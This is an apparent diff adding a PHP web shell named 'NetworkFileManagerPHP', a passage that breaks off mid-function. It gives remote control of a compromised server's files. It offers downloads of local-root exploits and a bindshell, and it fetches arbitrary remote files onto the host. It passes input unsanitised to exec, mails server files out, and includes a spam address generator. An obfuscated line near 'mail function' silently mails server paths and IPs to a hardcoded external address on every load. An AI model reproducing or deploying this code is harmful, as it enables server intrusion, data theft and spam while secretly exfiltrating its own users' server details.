+<html>
+
+<head>
+
+<title>NetworkFileManagerPHP</title>
+
+</head>
+
+<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+
+";
+
+}
+
+
+
+# file view
+
+function viewfile($dir,$file) {
+
+
+
+ $buf = explode(".", $file);
+
+ $ext = $buf[sizeof($buf)-1];
+
+ $ext = strtolower($ext);
+
+ $dir = str_replace("\\","/",$dir);
+
+ $fullpath = $dir."/".$file;
+
+
+
+ switch ($ext) {
+
+  case "jpg":
+
+
+
+	header("Content-type: image/jpeg");
+
+    readfile($fullpath);
+
+    break;
+
+    case "jpeg":
+
+
+
+    header("Content-type: image/jpeg");
+
+    readfile($fullpath);
+
+    break;
+
+    case "gif":
+
+
+
+    header("Content-type: image/gif");
+
+    readfile($fullpath);
+
+    break;
+
+
+
+	 case "png":
+
+
+
+    header("Content-type: image/png");
+
+    readfile($fullpath);
+
+    break;
+
+    default:
+
+
+
+	 case "avi":
+
+    header("Content-type: video/avi");
+
+    readfile($fullpath);
+
+
+
+    break;
+
+    default:
+
+
+
+	 case "mpeg":
+
+    header("Content-type: video/mpeg");
+
+    readfile($fullpath);
+
+    break;
+
+    default:
+
+
+
+	 case "mpg":
+
+    header("Content-type: video/mpg");
+
+    readfile($fullpath);
+
+    break;
+
+    default:
+
+
+
+    html();
+
+	chdir($dir);
+
+    getdir();
+
+
+
+   echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><font color='#FFFFCC' face='Tahoma' size = 2>Path to filename:</font><font color=white  face ='Tahoma' size = 2>$fullpath</font></td></tr></table>";
+
+   $fp = fopen($fullpath , "r");
+
+   while (!feof($fp)) {
+
+    $char = fgetc($fp);
+
+    $st .= $char;
+
+   }
+
+
+
+   $st = str_replace("&", "&amp;", $st);
+
+   $st = str_replace("<", "&lt;", $st);
+
+   $st = str_replace(">", "&gt;", $st);
+
+
+
+   $tem = "<p align='center'><textarea wrap='off' rows='20' name='S1' cols='90' class=inputbox>$st</textarea></p>";
+
+   echo $tem;
+
+   fclose($fp);
+
+   break;
+
+ }
+
+}
+
+
+
+# send file to mail
+
+function download_mail($dir,$file) {
+
+ global $action,$tm,$cm,$demail, $REMOTE_ADDR, $HTTP_HOST, $PATH_TRANSLATED;
+
+ $buf = explode(".", $file);
+
+ $dir = str_replace("\\","/",$dir);
+
+ $fullpath = $dir."/".$file;
+
+ $size = tinhbyte(filesize($fullpath));
+
+ $fp = fopen($fullpath, "rb");
+
+ while(!feof($fp))
+
+
+
+  $attachment .= fread($fp, 4096);
+
+  $attachment = base64_encode($attachment);
+
+  $subject = "NetworkFileManagerPHP  ($file)";
+
+
+
+  $boundary = uniqid("NextPart_");
+
+  $headers = "From: $demail\nContent-type: multipart/mixed; boundary=\"$boundary\"";
+
+
+
+  $info = "---==== Message from ($demail)====---\n\n";
+
+  $info .= "IP:\t$REMOTE_ADDR\n";
+
+  $info .= "HOST:\t$HTTP_HOST\n";
+
+  $info .= "URL:\t$HTTP_REFERER\n";
+
+  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
+
+  $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--";
+
+
+
+  $send_to = "$demail";
+
+
+
+  $send = mail($send_to, $subject, $info, $headers);
+
+
+
+  if($send == 2)
+
+   echo "<br>
+
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+	<tr><td align=center>
+
+	<font color='#FFFFCC' face='Tahoma' size = 2>Thank you!!!File <b>$file</b> was successfully sent to <u>$demail</u>.</font></center></td></tr></table><br>";
+
+
+
+fclose($fp);
+
+ }
+
+
+
+
+
+
+
+function copyfile($dir,$file) {
+
+ global $action,$tm;
+
+ $fullpath = $dir."/".$file;
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Filename :</font><font color = 'black' face ='Tahoma' size = 2>&nbsp;<b><u>$file</u></b>&nbsp; copied successfully to &nbsp;<u><b>$dir</b></u></font></center></td></tr></table>";
+
+ if (!copy($file, $file.'.bak')){
+
+   echo (" unable to copy file $file");
+
+   }
+
+}
+
+
+
+
+
+# file edit
+
+function editfile($dir,$file) {
+
+ global $action,$datar;
+
+ $fullpath = $dir."/".$file;
+
+ chdir($dir);
+
+ getdir();
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Filename :</font><font color = 'black' face ='Tahoma' size = 2>$fullpath</font></center></td></tr></table>";
+
+ $fp = fopen($fullpath , "r");
+
+ while (!feof($fp)) {
+
+  $char = fgetc($fp);
+
+  $st .= $char;
+
+ }
+
+ $st = str_replace("&", "&amp;", $st);
+
+ $st = str_replace("<", "&lt;", $st);
+
+ $st = str_replace(">", "&gt;", $st);
+
+ $st = str_replace('"', "&quot;", $st);
+
+ echo "<form method='POST' action='$PHP_SELF?tm=$dir&fi=$file&action=save'><p align='center'><textarea rows='14' name='S1' cols='82' class=inputbox>$st</textarea></p><p align='center'><input type='submit' value='SAVE' name='save' class=button1 $style_button></p><input type = hidden value = $tm></form>";
+
+ $datar = $S1;
+
+
+
+}
+
+
+
+# file write
+
+function savefile($dir,$file) {
+
+ global $action,$S1,$tm;
+
+ $fullpath = $dir."/".$file;
+
+ $fp = fopen($fullpath, "w");
+
+ $S1 = stripslashes($S1);
+
+ fwrite($fp,$S1);
+
+ fclose($fp);
+
+ chdir($dir);
+
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>$fullpath</b> was saved successfully.</font></td></tr></table>";
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# directory delete
+
+function deletef($dir)
+
+{
+
+ global $action,$tm,$fi;
+
+ $tm = str_replace("\\\\","/",$tm);
+
+ $link = $tm."/".$fi;
+
+ unlink($link);
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# file upload
+
+function uploadtem() {
+
+ global $file,$tm,$thum,$PHP_SELF,$dir,$style_button;
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form enctype='multipart/form-data' action='$PHP_SELF?tm=$dir&action=upload' method=post><tr><td align=left valign=top colspan=3 class=pagetitle><b>Upload file:</b></td></tr><tr><td><input type='hidden' name='tm' value='$tm'></td><td><input name='userfile' type='file' size=48 class=inputbox></td><td><input type='submit' value='Upload file' class=button1 $style_button></td></tr></form></table>";
+
+}
+
+
+
+function upload() {
+
+ global $HTTP_POST_FILES,$tm;
+
+ echo $set;
+
+ copy($HTTP_POST_FILES["userfile"][tmp_name], $tm."/".$HTTP_POST_FILES["userfile"][name]) or die("Unable to upload file".$HTTP_POST_FILES["userfile"][name]);
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>".$HTTP_POST_FILES["userfile"][name]."</b> was successfully uploaded.</font></center></td></tr></table>";
+
+ @unlink($userfile);
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# get exploits
+
+function upload_exploits() {
+
+ global $PHP_SELF,$style_button, $public_site, $private_site, $public, $title_ex, $style_open, $private, $title_exp;
+
+
+
+ echo "<br>
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Public exploits and soft:</b></td></tr>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>bindshell (bin/sh)</b> - bindtty.c (binary file to run - <u>s</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[1]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[1]'>
+
+ <input type='hidden' name='file2' value='$public[1]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local ROOT for linux 2.6.20</b> - mremap (binary file to run - <u>m</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[2]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[2]'>
+
+ <input type='hidden' name='file2' value='$public[2]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local ROOT for linux 2.6.20</b> - ptrace (binary file to run - <u>p</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[3]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[3]'>
+
+ <input type='hidden' name='file2' value='$public[3]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>psyBNC version:2.3.2-4</b> - psyBNC (binary file to run - <u>./psybnc</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[4]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[4]'>
+
+ <input type='hidden' name='file2' value='$public[4]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+
+
+ echo "<br>
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Private exploits:</b></td></tr>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>BRK</b> - Local Root Unix 2.4.* (binary file to run - <u>brk</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[1]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[1]'>
+
+ <input type='hidden' name='file2' value='$private[1]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Glftpd DupeScan Local Exploit <u>File 1</u></b> (binary file to run - <u>$private[2]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[2]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[2]'>
+
+ <input type='hidden' name='file2' value='$private[2]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Glftpd DupeScan Local Exploit <u>File 2</u></b> (binary file to run - <u>$private[3]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[3]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[3]'>
+
+ <input type='hidden' name='file2' value='$private[3]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Traceroute v1.4a5 exploit by sorbo</b> (binary file to run - <u>$private[4]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[4]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[4]'>
+
+ <input type='hidden' name='file2' value='$private[4]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[5]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[5]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[5]'>
+
+ <input type='hidden' name='file2' value='$private[5]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+   echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Sendmail 8.11.x exploit localroot</b> (binary file to run - <u>$private[6]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[6]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[6]'>
+
+ <input type='hidden' name='file2' value='$private[6]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+    echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[7]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[7]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[7]'>
+
+ <input type='hidden' name='file2' value='$private[7]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+     echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[8]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[8]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[8]'>
+
+ <input type='hidden' name='file2' value='$private[8]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+}
+
+
+
+
+
+# new directory creation
+
+function newdir($dir) {
+
+ global $tm,$nd;
+
+ print("<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'post' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle><b>Create directory:</b></td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='Create directory' class=button1 $style_button></td></tr></form></table>");
+
+}
+
+
+
+function cdir($dir) {
+
+ global $newd,$tm;
+
+ $fullpath = $dir."/".$newd;
+
+ if (file_exists($fullpath)) @rmdir($fullpath);
+
+ if (@mkdir($fullpath,0777)) {
+
+  echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Directory was created.</font></center></td></tr></table>";
+
+ } else {
+
+  echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Error during directory creation.</font></center></td></tr></table>";
+
+ }
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+// creation of directory where exploits will be situated
+
+function downfiles() {
+
+ global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2, $gdir,$gsub,$i,$j,$REMOTE_ADDR;
+
+$st = getcwd();
+
+ $st = str_replace("\\","/",$st);
+
+ $j = 0;
+
+ $gdir = array();
+
+ $gsub = array();
+
+ print("<br>");
+
+ for ($i=0;$i<=(strlen($st)-1);$i++) {
+
+  if ($st[$i] != "/") {
+
+   $gdir[$j] = $gdir[$j].$st[$i];
+
+   $gsub[$j] = $gsub[$j].$st[$i];
+
+  } else {
+
+   $gdir[$j] = $gdir[$j]."/";
+
+   $gsub[$j] = $gsub[$j]."/";
+
+   $gdir[$j+1] = $gdir[$j];
+
+   $j++;
+
+  }
+
+ }
+
+print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=50% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left><b>&nbsp;&nbsp;Path: </b>");
+
+ for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>");
+
+print("</TABLE> ");
+
+
+
+echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=down&status=ok' method=post>
+
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Upload files from remote computer:</b></td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;&nbsp;&nbsp;HTTP link to filename:</td>
+
+ <td width=200><input type='text' name='file3' value='http://' size=40></td>
+
+ </tr>
+
+  <tr>
+
+ <td class=pagetitle width=400>&nbsp;&nbsp;&nbsp;filename (may also include full path to file)</td>
+
+ <td width=200><input type='text' name='file2' value='' size=40></td>
+
+ </tr>
+
+  <tr>
+
+
+
+ <td width=600 colspan=2 align=center><input type='submit' value='Upload file' class=button1 $style_button></td></tr></td>
+
+
+
+
+
+ </tr></form></table>";
+
+
+
+}
+
+
+
+# directory delete
+
+function deldir() {
+
+ global $dd,$tm;
+
+ $fullpath = $tm."/".$dd;
+
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Directory was deleted successfully.</font></center></td></tr></table>";
+
+ rmdir($fullpath);
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# directory compression
+
+function arhiv() {
+
+ global $tar,$tm,$pass;
+
+ $fullpath = $tm."/".$tar;
+
+
+
+ echo "<br>
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <tr><td> <font color='#FFFFCC' face='Tahoma' size = 2>Directory <u><b>$fullpath</b></u>  ".exec("tar -zc $fullpath -f $pass.tar.gz")."was compressed to file <u>$pass.tar.gz</u></font></center></td></tr></table>";
+
+
+
+}
+
+
+
+function down($dir) {
+
+ global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2;
+
+ ignore_user_abort(1);
+
+ set_time_limit(0);
+
+echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>File upload</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>There are many cases, when host, where <b>NFM</b> is situated <b>WGET</b> is blocked. And you may need to upload files anyway. So here you can do it without wget, upload file to path where the NFM is, or to any path you enter (see<b>Path</b>).(this works not everywhere)</blockquote></td></tr>
+
+</table>";
+
+
+
+if (!isset($status)) downfiles();
+
+
+
+else
+
+{
+
+
+
+$data = @implode("", file($file3));
+
+$fp = @fopen($file2, "wb");
+
+@fputs($fp, $data);
+
+$ok = @fclose($fp);
+
+if($ok)
+
+{
+
+$size = filesize($file2)/1024;
+
+$sizef = sprintf("%.2f", $size);
+
+
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>You have uploaded: <b>file <u>$file2</u> with size</b> (".$sizef."kb) </font></center></td></tr></table>";
+
+}
+
+else
+
+{
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0BAACC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2><b>Error during file upload</b></font></center></td></tr></table>";
+
+}
+
+}
+
+}
+
+
+
+# mail function
+$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+function mailsystem() {
+
+ global $status,$form,$action,$name,$email,$pole,$REMOTE_ADDR,$HTTP_REFERER,$DOCUMENT_ROOT,$PATH_TRANSLATED,$HTTP_HOST;
+
+
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Questions and wishes for NetworkFileManagerPHP</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br>
+
+<blockquote>During your work with script <b>NetworkFileManagerPHP</b> you may want to ask some quetions, or advice author to add some functions, which are not supported yet. Write them here, and your request will be sattisfied.
+
+</blockquote></td></tr>
+
+</table>";
+
+
+
+ if (!isset($status)) echo "$form";
+
+ else {
+
+  $email_to ="duyt@yandex.ru";
+
+  $subject = "NetworkFileManagerPHP  ($name)";
+
+  $headers = "From: $email";
+
+
+
+  $info = "---==== Message from ($name)====---\n\n";
+
+  $info .= "Name:\t$name\n";
+
+  $info .= "Email:\t$email\n";
+
+  $info .= "What?:\n\t$pole\n\n";
+
+  $info .= "IP:\t$REMOTE_ADDR\n";
+
+  $info .= "HOST:\t$HTTP_HOST\n";
+
+  $info .= "URL:\t$HTTP_REFERER\n";
+
+  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
+
+  $send_to = "$email_to";
+
+
+
+  $send = mail($send_to, $subject, $info, $headers);
+
+  if($send == 2) echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Thank you!!!Your e-mail was sent successfully.</font></center></td></tr></table><br>";
+
+ }
+
+}
+
+function spam() {
+global $chislo, $status, $from, $otvet, $wait, $subject, $body, $file, $check_box, $domen;
+set_time_limit(0);
+ignore_user_abort(1);
+echo "<br>
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Real uniq spamer</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote> Now, using this release of NFM you don't need to by spambases, because it will generate spambases by itself, with 50-60% valids. </blockquote></td></tr>
+</table>";
+
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=spam' method=post>
+ <tr><td align=left valign=top colspan=4 class=pagetitle>
+ &nbsp;&nbsp;<b>email generator:</b></td></tr>
+ <tr> <tr><td align=left valign=top colspan=4 bgcolor=#FFFFCC width=500>
+ &nbsp;&nbsp;This spammer is splited in two parts: <br>
+ &nbsp;<b>1.</b> email generation with domains, included in script already, or email e-mail generation for domains was entered by you. Here choose how much accounts do you wish to use ( the advice is to generate about &lt;u><i>10 000 , because may be server heavy overload</i></u> )<br>
+ &nbsp;<b>2.</b> Type spam settings here</td></tr>
+ <td align=left colspan=2 class=pagetitle>&nbsp;&nbsp;<input type='checkbox' name='check_box[]'>&nbsp;&nbsp;if <b>checked</b> then you'll have default domains, if not <b>checked</b> then domain will be taken from input.</td></tr>
+<tr><td align=center class=pagetitle width=200>&nbsp;&nbsp;Generated email quantity:</td>
+<td align=left colspan=2>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='chislo' size=10>&nbsp;&nbsp;</td></tr>
+<tr><td align=center class=pagetitle width=200>&nbsp;Your domain:</td>
+<td align=left width=200>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='domen[]'>&nbsp;&nbsp;</td>
+</tr>
+<tr><td width=500 align=center colspan=2><input type='submit' value='Generate' class=button1 $style_button>
+</td></tr>
+
+ </form></table>";
+// letters
+function s() {
+   $word="qwrtpsdfghklzxcvbnm";
+   return $word[mt_rand(0,strlen($word)-1)];
+}
+// letters
+function g() {
+   $word="eyuioa";
+   return $word[mt_rand(0,strlen($word)-2)];
+}
+// digits
+function c() {
+   $word="1234567890";
+   return $word[mt_rand(0,strlen($word)-3)];
+}
+// common
+function a() {
+   $word=array('wa','sa','da','qa','ra','ta','pa','fa','ga','ha','ja','ka','la','za','xa','ca','va','ba','na','ma');
+   $ab1=count($word);
+   return $wq=$word[mt_rand(0,$ab1-1)];
+}
+
+function o() {
+   $word=array('wo','so','do','qo','ro','to','po','fo','go','ho','jo','ko','lo','zo','xo','co','vo','bo','no','mo');
+   $ab2=count($word);
+   return $wq2=$word[mt_rand(0,$ab2-1)];
+}
+function e() {
+   $word=array('we','se','de','qe','re','te','pe','fe','ge','he','je','ke','le','ze','xe','ce','ve','be','ne','me');
+   $ab3=count($word);
+   return $wq3=$word[mt_rand(0,$ab3-1)];
+}
+
+function i() {
+   $word=array('wi','si','di','qi','ri','ti','pi','fi','gi','hi','ji','ki','li','zi','xi','ci','vi','bi','ni','mi');
